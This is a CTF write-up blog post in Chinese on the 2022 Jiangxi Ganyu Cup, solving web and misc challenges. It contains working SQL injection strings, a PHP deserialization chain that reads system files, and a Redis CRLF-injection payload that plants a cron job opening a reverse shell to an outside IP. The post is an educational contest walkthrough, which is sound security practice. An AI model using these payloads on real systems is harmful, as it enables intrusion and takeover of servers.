2022年江西省赣育杯网络安全大赛学生组Web&Misc Writeup

已于 2023-04-25 22:44:52 修改
阅读量6.6k 收藏 22
点赞数 17
分类专栏: Game Writeups 文章标签: 赣育杯 2022赣育杯网络安全大赛
于 2022-10-09 11:52:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/127216646
版权

文章目录

WEB

签到

?id=-1'union select 1,(select group_concat(schema_name) from information_schema.schemata),3,4,5--+

?id=-1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='SQL01'),3,4,5--+

?id=-1'union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3,4,5--+

?id=-1'union select 1,(select flag from SQL01.users),3,4,5--+

在这里插入图片描述

easyzphp

<?php
include 'pop.php'; // Next step in pop.php
if (preg_match('/pop\.php\/*$/i', $_SERVER['PHP_SELF']))
{
    exit("no way!");
}
if (isset($_GET['source']))
{
    $path = basename($_SERVER['PHP_SELF']);
    if (!preg_match('/pop.php$/', $path) && !preg_match('/index.php$/', $path))
    {
        exit("nonono!");
    }
    highlight_file($path);
    exit();
}
?>
<a href="index.php?source">Source</a>

造成这里的绕过主要是因为basename()Linux下,如果取得的文件名开头是非ASCII码范围的字符,则basename()会抛弃这个文件名,继续往上一层走,把上一层的文件名取出来,直到获取到正常可显示ASCII字符开头的文件名(Windows下直接获取)。

在这里插入图片描述
payload:/index.php/pop.php/%80?source

读取到pop.php的源码

<?php
error_reporting(1);
class SSRF
{
    public $f;
    public $hint;
    
    public function __invoke()
    {
        if (filter_var($this->hint, FILTER_VALIDATE_URL)) {
            $r = parse_url($this->hint);
            if (!empty($this->f)) {
                if (strpos($this->f, "try") !==  false && strpos($this->f, "pass") !== false) {
                    @include($this->f . '.php');//something in hint.php
                } else {
                    die("try again!");
                }
                if (preg_match('/prankhub$/', $r['host'])) {
                    @$out = file_get_contents($this->hint);
                    echo $out;
                } else {
                    die("error");
                }
            } else {
                die("try it!");
            }
        } else {
            die("Invalid URL");
        }
    }
}

class Abandon
{
    public $test;
    public $pop;
    public function __construct()
    {
        $this->test = "";
        $this->pop = "";
    }

    public function __toString()
    {
        return $this->pop['object']->test;
    }

    public function __wakeup()
    {
        if (preg_match("/flag/i", $this->test)) {
            echo "hacker";
            $this->test = "index.php";
        }
    }
}

class Route
{
    public $point;
    public function __construct()
    {
        $this->point = array();
    }

    public function __get($key)
    {
        $function = $this->point;
        return $function();
    }
}

if (isset($_POST['object'])) {
    unserialize($_POST['object']);
}

$this->hint只需要是一个有效的URL,且parse_url($this->hint)['host']==/prankhub$/

PS C:\Users\Administrator\Downloads> php -r "var_dump(parse_url(filter_var('mochu7://prankhub/', FILTER_VALIDATE_URL))['host']);"
Command line code:1:
string(8) "prankhub"

Abandon::__construct() -> Abandon::__wakeup() -> Abandon::__toString() -> Route::__get() -> SSRF::__invoke()

poc

<?php 
class SSRF
{
	public $f;
	public $hint;
}

class Abandon
{
	public $test;
	public $pop;
}

class Route
{
	public $point;
}

$abandon = new Abandon();
$abandon->test = new Abandon();
$route = new Route();
$route->point = new SSRF();
$route->point->f = 'trypass';
$route->point->hint = 'mochu7://prankhub/../../../../../../../etc/passwd';
$abandon->test->pop = array("object" => $route);

echo serialize($abandon);

object=O:7:"Abandon":2:{s:4:"test";O:7:"Abandon":2:{s:4:"test";N;s:3:"pop";a:1:{s:6:"object";O:5:"Route":1:{s:5:"point";O:4:"SSRF":2:{s:1:"f";s:7:"trypass";s:4:"hint";s:49:"mochu7://prankhub/../../../../../../../etc/passwd";}}}}s:3:"pop";N;}

在这里插入图片描述
hint.php

object=O:7:"Abandon":2:{s:4:"test";O:7:"Abandon":2:{s:4:"test";N;s:3:"pop";a:1:{s:6:"object";O:5:"Route":1:{s:5:"point";O:4:"SSRF":2:{s:1:"f";s:7:"trypass";s:4:"hint";s:60:"mochu7://prankhub/../../../../../../../var/www/html/hint.php";}}}}s:3:"pop";N;}

在这里插入图片描述
读flag

object=O:7:"Abandon":2:{s:4:"test";O:7:"Abandon":2:{s:4:"test";N;s:3:"pop";a:1:{s:6:"object";O:5:"Route":1:{s:5:"point";O:4:"SSRF":2:{s:1:"f";s:7:"trypass";s:4:"hint";s:57:"mochu7://prankhub/../../../../../../../f1111444449999.txt";}}}}s:3:"pop";N;}

在这里插入图片描述

ezpy

扫出一个/source

在这里插入图片描述
得到源码

#!python
#!/usr/bin/env python3
import os
import urllib
import urllib.request
import urllib.error
import redis as redis
from flask import Flask, request, render_template


app = Flask(__name__)
redis_conn = redis.Redis(host='127.0.0.1', port=6379, password=os.getenv("P"), db=0)

@app.route("/getinfo")
def getinfo():
    sitename = request.args.get("sitename")
    sitename = redis_conn.get(sitename).decode()
    if not sitename.startswith(('http','file')):
        return "错误:不支持协议"
    try:
        return urllib.request.urlopen(sitename).read()
    except Exception as e:
        return "错误:  " + str(e)

@app.route("/setinfo",methods=['POST'])
def setinfo():
    username = request.form.get("sitename")
    siteurl =  request.form.get("siteurl")
    if redis_conn.set(username,siteurl):
        return "ok"
    return "!!!"

@app.route("/")
def index():
    return render_template("index.html")

@app.route("/sitelist")
def sitelist():
    return render_template("sitelist.html",sitelist=redis_conn.keys())


@app.route("/source")
def source():
    return open("/app/app.py","r").read()


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80,debug=False)

有本地的Redis,并且给出了密码是环境变量P的值,且siteurl利用file协议可任意文件读取

http://192.168.38.220:8044/setinfo

sitename=env&siteurl=file:///proc/self/environ

在这里插入图片描述
拿到Redis的认证密码,就可以做有密码认证的的Redis攻击

在这里插入图片描述

注意到这里使用的是Python 3.7,且使用了urllib模块,而Python 3.x-3.7.2版本中的urllib存在CRLF攻击
https://www.anquanke.com/post/id/240014#h2-8

那么这里就可以利用CRLF做有密码认证的Redis攻击,创建计划任务反弹Shell
https://www.modb.pro/db/65827

http://127.0.0.1:6379/ HTTP/1.1
auth 1bcc23dfc231aac
$8
flushall
*3
$3
set
$1
1
$66


*/1 * * * * bash -c "sh -i >& /dev/tcp/111.11.11.11/7777 0>&1"


*4
$6
config
$3
set
$3
dir
$16
/var/spool/cron/
*4
$6
config
$3
set
$10
dbfilename
$4
root
*1
$4
save

mochu7:

修改为自己的VPS注意Bulk Strings表示的长度,并且要注意闭合原来的HTTP请求。

from urllib.parse import *

payload = 'http://127.0.0.1:6379/ HTTP/1.1\r\nauth 1bcc23dfc231aac\r\n$8\r\nflushall\r\n*3\r\n$3\r\nset\r\n$1\r\n1\r\n$66\r\n\r\n\r\n*/1 * * * * bash -c "sh -i >& /dev/tcp/111.11.11.11/7777 0>&1"\r\n\r\n\r\n*4\r\n$6\r\nconfig\r\n$3\r\nset\r\n$3\r\ndir\r\n$16\r\n/var/spool/cron/\r\n*4\r\n$6\r\nconfig\r\n$3\r\nset\r\n$10\r\ndbfilename\r\n$4\r\nroot\r\n*1\r\n$4\r\nsave\r\n\r\nmochu7:'
print(quote(payload))

利用Burp给/setinfo传入sitenamesiteurl

在这里插入图片描述

然后等待反弹shell即可

在这里插入图片描述

MISC

byteMuisc

这题运气好抢了个一血

在这里插入图片描述

beep.png末尾发现密码

在这里插入图片描述

LSB提取数据

在这里插入图片描述

a=64E3,80*(128<t*[[6.5,7.3,8.7,7.3,11,0,0,11,0,0,10,0,0,0,0,0,6.5,7.3,8.2,6.5,10,0,0,10,0,0,8.7,0,0,8.2,7.3,0,6.5,7.3,8.7,7.3,8.7,0,0,0,10,0,8.2,0,0,7.3,6.5,0,0,0,6.5,0,10,0,0,0,8.7,0,0,0,0,0,0,0][int(64*t/a%64)]][int(t/a)%1]%255)*(1-64*t%a/a)

在这里插入图片描述

https://www.reddit.com/r/bytebeat/comments/s0b0m0/i_made_the_coolest_music/

https://dollchan.net/bytebeat/index.html

在这里插入图片描述

很明显的瑞克摇

PS C:\Users\Administrator> php -r "echo md5('never_gonna_give_you_up');"
daa2c770480cf44a285cd9225de2d522

SangFor{daa2c770480cf44a285cd9225de2d522}

有趣的PDF

在这里插入图片描述

hint:
有趣的PDF 1、PDF结构: launchURL 2、js in PDF 3、2021在野漏洞的出题灵感

art.pdf中嵌套了一个pdf,有密码

在这里插入图片描述
foremost分离出一张图片

在这里插入图片描述

得到信息:part2: unicode

在这里插入图片描述

PDFStreamDumper发现第一部分密码:password:baseURL_

在这里插入图片描述

得到where.pdf的密码:baseURL_unicode

在这里插入图片描述

where.pdf的JS注释区有一段貌似加密的数据?

在这里插入图片描述

之后就不会了,hint提示说是2021在野漏洞,找了半天没啥进展

如果哪位师傅解了这题希望能一起交流下这题,我的联系方式:UVE6IDIzOTI1MTczNTk= 谢谢^_^

末 初
关注
  • 17
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 6
    评论
专栏目录
2021“绿城杯”网络安全大赛
09-30
2021“绿城杯”网络安全大赛是一场聚焦网络安全技术的竞技活动,旨在提升参赛者在信息安全领域的专业技能,增强社会对网络安全的重视。CTF(Capture The Flag)是网络安全竞赛的一种形式,参赛团队通过解决一系列...
2022第二届网刃杯网络安全大赛 MISC-玩坏的winxp 详细解题过程。
04-25
本文主要讲述了参加2022第二届网刃杯网络安全大赛MISC类别中“玩坏的winxp”解题的过程,这是一道涉及Windows XP系统、数据恢复、文件隐藏与加密的综合题目。难度系数为4.0,挑战者需要具备一定的网络安全技能,...
2022 赣育杯 CTF --- Crypto Lost_N wp
3tefanie丶zhou的博客
02-23 793
【人生总是这样,真正在意的人,好像如何也挽留不住。】
赣网杯2022初赛misc1
wha1e的博客
12-10 508
赣网杯2022初赛misc1
赣网杯GWBCTF2021 writeup
Laffrey的专栏
12-07 3625
0x01.[Misc]decodemaster-Closed 从题目得到一个docx文件“decodemaster.docx”,打开,发现内容是乱码。 仔细一看,发现字体是Wingdings 2,果然是套路。 全选文本,将字体修改为宋体,得到正常的文字。 Sllv we GMT gje dsh vc sim gzwspio! EHRw tfk koa sq om reocxeua lzdpuil. W rkwa xsg tqiewtc pb wznjurz o vwspmnwzm...
2021赣网杯网络安全大赛_部分Writeup
热门推荐
Keepb1ue的博客
12-07 1万+
Web 1.checkin 这种游戏类题目,一般都是用js去做控制结果 直接查看网页源码点到http://118.31.60.233:10000/js/game.js Ctrl+F直接搜flag flag{134791e2-d93c-4d01-a71f-dcbe82d7fe08} 2.gwb-web-easypop <?php error_reporting(0); highlight_file(__FILE__); $pwd=getcwd(); class func { pu
2021赣网杯部分writeup
swordheart的博客
12-07 418
checkin 连连看 查看源码,存在多个js文件 在game.js中获取flag{134791e2-d93c-4d01-a71f-dcbe82d7fe08} easypop unserialize($this->key)(); 关键点在这 当[new BBB,”test”]() 会调用BBB的test方法 然后$a('',$this->code); 经典create_function 的格式 poc <?php class func { ...
2021中职“网络安全江西省赛题—B-8:Web渗透测试
weixin_57060854的博客
06-01 2328
学习交流(要环境的可以滴滴),或者遇到不会的可以+qq:3455475542任务环境说明:  服务器场景:Server03  服务器场景操作系统:未知(关闭连接)通过本地PC中的渗透测试平台Kali对靶机进行WEB渗透,找到页面内的文件上传漏洞并且尝试进行上传攻击,使用相关的渗透测试手段,获取到WEB权限,使用相关指令获取到当前linux用户UID为5的用户,将该用户的用户名称作为Flag进行提交; 通过本地PC中的渗透测试平台Kali对靶机进行WEB渗透,找到页面内的文件上传漏洞并且尝试进行上传攻击,
深育杯 2021 高校 CTF 网络安全大赛 专业竞赛 真题 zip
12-07
深育杯 2021 高校 CTF 网络安全大赛 专业竞赛 真题
2022网络安全中山市香山杯misc题目附件
11-01
2022网络安全中山市香山杯misc题目附件
领航杯 CTF 2021 决赛 真题 7z
12-07
领航杯 CTF 2021 决赛
Sptring Boot整合mybatis(连接数据库测试及md5加密)
11-08
SpringBoot简单项目开发,适应初学者,整合mybatis,页面简单测试,数据Md5加密
第三届广东省大学生网络安全攻防大赛新手备赛cry-misc
最新发布
05-28
共同学习一起进步。里面有博主自己刷的misc杂项、密码学题目与解题过程,虽新手但也尽可能做到过程详细讲解了。放在这里有需要的就下载,我也当作第一次参加这个比赛的回忆。
第一届赣网杯网络安全大赛 2020GW-CTF Web_Writeup
末初的CSDN博客
09-08 4026
赛题类型WebEasyPhpparseHashMisc签到CheckinfaceDestroyJavaHidepig Web EasyPhp <?php $sz_txt = $_GET["sz_txt"]; $sz_file = $_GET["sz_file"]; $password = $_GET["password"]; if(isset($sz_txt)&&(file_get_contents($sz_txt,'r')==="welcome to jxsz")){
2021第二届赣网杯网络安全大赛MISC-Writeup
末初的CSDN博客
12-06 7198
文章目录decodemastergwb-misc-lovemathgwb-misc3-testcat decodemaster decodemaster.docx的内容是wingding编码:https://lingojam.com/WingDing Sllv we GMT gje dsh vc sim gzwspio! EHRw tfk koa sq om reocxeua lzdpuil. W rkwa xsg tqiewtc pb wznjurz o vwspmnwzmvem jegbmnwz
2022赣政杯CTF---Writeup
3tefanie丶zhou的博客
08-23 2219
【喜欢一个女子时,岂敢不真心,岂敢不用心。】
2022赣育杯CTF---Wilson wp
3tefanie丶zhou的博客
10-10 686
【真正爱一个人,就算把自己的全世界都给了她,却依然担心给的不够多,不够好。】
2022赣育杯pwn
hanabi_sh
10-13 330
2022赣育杯pwn easypwn skyshell
第二届赣网杯WEB第一题WP
冰封 战戟
04-27 1798
第二届赣网杯WEB第一题WP
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末 初

谢谢老板!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值